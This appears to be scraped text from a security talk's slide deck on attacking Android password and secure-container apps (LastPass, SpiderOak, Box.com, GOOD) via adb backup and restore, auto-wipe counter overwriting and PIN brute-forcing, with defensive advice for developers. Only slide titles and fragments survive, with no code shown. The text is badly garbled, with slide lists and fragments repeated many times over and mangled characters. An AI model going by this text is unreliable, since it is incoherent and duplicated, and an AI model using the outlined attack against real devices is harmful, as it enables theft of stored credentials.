Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

